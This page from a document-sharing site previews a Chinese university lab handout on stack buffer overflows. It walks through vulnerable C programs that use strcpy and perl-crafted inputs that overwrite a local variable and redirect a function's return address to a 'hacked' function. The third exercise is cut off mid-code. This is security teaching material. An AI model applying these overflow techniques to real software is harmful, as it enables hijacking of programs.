




版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
1、實(shí)驗(yàn)二 棧溢出實(shí)驗(yàn)【實(shí)驗(yàn)內(nèi)容】利用棧溢出修改變量值利用棧溢出修改函數(shù)返回地址,運(yùn)行惡意代碼【實(shí)驗(yàn)類型】驗(yàn)證型實(shí)驗(yàn)【實(shí)驗(yàn)學(xué)時(shí)】3學(xué)時(shí)【實(shí)驗(yàn)原理】如果向棧上聲明的緩沖區(qū)中復(fù)制數(shù)據(jù),但是復(fù)制到數(shù)據(jù)量又比緩沖區(qū)大的時(shí)候,就會(huì)發(fā)生棧溢出。在棧上聲明的各種變量的位置緊臨函數(shù)調(diào)用程序的返回地址。若用戶輸入的數(shù)據(jù)未經(jīng)驗(yàn)證就傳遞給strcpy這樣的函數(shù),則會(huì)導(dǎo)致變量值被攻擊者指定的值所改寫或調(diào)用函數(shù)的返回地址將被攻擊者選擇的地址所覆蓋,打亂程序正常運(yùn)行流程,轉(zhuǎn)而執(zhí)行惡意代碼。防范棧溢出的有效方法有:禁止棧執(zhí)行,從而阻止攻擊者植入惡意代碼;編寫安全可靠的代碼,始終對(duì)輸入的內(nèi)容進(jìn)行驗(yàn)證;利用編譯器的邊界檢查實(shí)現(xiàn)棧保
2、護(hù)?!緦?shí)驗(yàn)環(huán)境】Linux實(shí)驗(yàn)臺(tái)(CentOS)gcc和gdb工具【實(shí)驗(yàn)步驟】打開Linux實(shí)驗(yàn)臺(tái),輸入用戶名和口令,進(jìn)入系統(tǒng)。一、 修改變量值(1) 新建stackover1.c文件:touch stackover1.c;(2) 編輯stackover1.c文件:vim stackover1.c,按i鍵進(jìn)如編輯模式,輸入示例程序1,按Esc鍵退出編輯模式,進(jìn)入命令行,輸入:wq保存并退出文件編輯,上述過程如圖3.5.37和圖3.5.38所示; (3) 查看編輯結(jié)果:cat stackover1.c,如圖3.5.39所示; (4) 生成可執(zhí)行文件:gcc stackover1.c o stac
3、kover1;(5) 運(yùn)行執(zhí)行文件:./ stackover1 ABCDE,執(zhí)行結(jié)果如圖3.5.310所示; 從結(jié)果中可以看出,x的值為程序中的設(shè)定值10;(6) 在內(nèi)存中x緊鄰buf,所以輸入11個(gè)字符制造棧緩沖區(qū)溢出,以修改x所在地址空間的值:./ stackover1 ABCDEFGHIJK,運(yùn)行結(jié)果如圖3.5.311所示; x的值為75,對(duì)應(yīng)K的ASCII碼,x的值發(fā)生改變;(7) 利用perl命令輸入適當(dāng)?shù)淖址?,將x的值修改為任意指定的值,如修改為30,十六進(jìn)制為0x1e:./ stackover1 perl e print “A”x10 . “x1e”,運(yùn)行結(jié)果如圖3.5.312
4、所示; x的值為30,修改成功。示例程序1:#include <stdio.h>#include <string.h>void function(char * str) char buf10; int x=10; strcpy(buf,str); printf("x=%dn",x);int main(int argc,char * argv) function(argv1); return 0;二、 修改函數(shù)返回地址,運(yùn)行惡意代碼(1) 參照上述步驟,新建stackover2.c文件,輸入示例程序2,生成可執(zhí)行文件stackover2;(2) 運(yùn)行可
5、執(zhí)行文件并查看結(jié)果:./ stackover2 AAAAA,結(jié)果如圖3.5.313所示; 從結(jié)果中可以看出程序運(yùn)行的棧情況,foo函數(shù)的返回地址位于第7個(gè)位置上,bar的函數(shù)入口地址為0x08048421;(3) 隨意輸入多個(gè)字符制造棧溢出:./ stackover2 perl e print “A”x25,運(yùn)行結(jié)果如圖3.5.315所示; (4) 構(gòu)造輸入字符串,將第7個(gè)位置修改為bar函數(shù)入口地址,即修改foo函數(shù)的返回地址為bar函數(shù)的入口地址,以修改程序運(yùn)行流程:./ stackover2 perl e print “A”x14 . “x21x84x04x08”,運(yùn)行結(jié)果如圖3.5.3
6、17所示; bar函數(shù)運(yùn)行,打印出“Hi!Youve been hacked!”,攻擊成功。通常我們無法獲取函數(shù)的地址和程序運(yùn)行時(shí)棧的情況,需要通過反編譯來查看變量地址或函數(shù)的入口地址,通過深入理解程序運(yùn)行時(shí)的內(nèi)存分配來計(jì)算函數(shù)返回地址在內(nèi)存中的位置,以便達(dá)到修改程序運(yùn)行流程、執(zhí)行惡意代碼的目的示例程序2#include <stdio.h>#include <string.h>void foo(const char *input)char buf10;printf("My stack looks like:n%p n%p n%p n%p n%p n%p n%p
7、 n%p n n");strcpy(buf,input);printf("%sn",buf);printf("Now the stack looks like:n%p n%p n%p n%p n%p n%p n%p n%p n n");void bar(void)printf("Hi!You've been hacked!n"); int main(int argc,char *argv)printf("Address of foo=%p n",foo);printf("Address of bar=%p n",bar);foo(argv1);return 0;【實(shí)驗(yàn)思考】嘗試分析并畫出上述程序的棧結(jié)構(gòu),可借助gdb命令;嘗試在Windows環(huán)境下進(jìn)行上述實(shí)驗(yàn),并分析與Linux環(huán)境下的異同;根據(jù)程序運(yùn)行時(shí)的內(nèi)存分配原理計(jì)算函數(shù)的返回地址;以示例程序3為例,通過計(jì)算快速實(shí)現(xiàn)nevercalled函數(shù)的運(yùn)行。示例程序3#include <stdio.h>#include <string.h>void nevercalled() printf("never calledn"); exit(0);void funct
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 深圳職工勞務(wù)合同范本
- 2024年秋新北師大版七年級(jí)上冊(cè)生物課件 跨學(xué)科實(shí)踐活動(dòng) 活動(dòng)二 無土栽培一種植物 活動(dòng)二 無土栽培一種植物
- 2025年油氣管道保護(hù)工職業(yè)技能競(jìng)賽理論參考試指導(dǎo)題庫(kù)-上(單選題)
- 2025年煙葉評(píng)級(jí)技能競(jìng)賽理論參考試指導(dǎo)題庫(kù)-上(單選題)
- 小學(xué)生飲料安全課件
- 2025至2030年中國(guó)座椅升降器數(shù)據(jù)監(jiān)測(cè)研究報(bào)告
- 2025至2030年中國(guó)動(dòng)物籠子及附件數(shù)據(jù)監(jiān)測(cè)研究報(bào)告
- 2025至2030年中國(guó)保安型可視對(duì)講系統(tǒng)數(shù)據(jù)監(jiān)測(cè)研究報(bào)告
- 蒲城租房合同范本
- 屋面翻修協(xié)議合同范本
- 2024屆高三英語作文復(fù)習(xí)寫作專項(xiàng)讀后續(xù)寫:幫我修車的墨西哥一家人(人性之光)任務(wù)單學(xué)案
- 2022年四川省綿陽市中考語文真題
- 麥琪的禮物全面英文詳細(xì)介紹
- 使用智能手機(jī)教程文檔
- 數(shù)字資產(chǎn)培訓(xùn)課件
- (醫(yī)院安全生產(chǎn)培訓(xùn))課件
- 幼兒園優(yōu)質(zhì)公開課:中班數(shù)學(xué)《到艾比家做客》課件
- 保潔巡查記錄表
- 部編人教版歷史八年級(jí)下冊(cè)《三大改造》省優(yōu)質(zhì)課一等獎(jiǎng)教案
- 水輪機(jī)調(diào)速器現(xiàn)場(chǎng)調(diào)試
評(píng)論
0/150
提交評(píng)論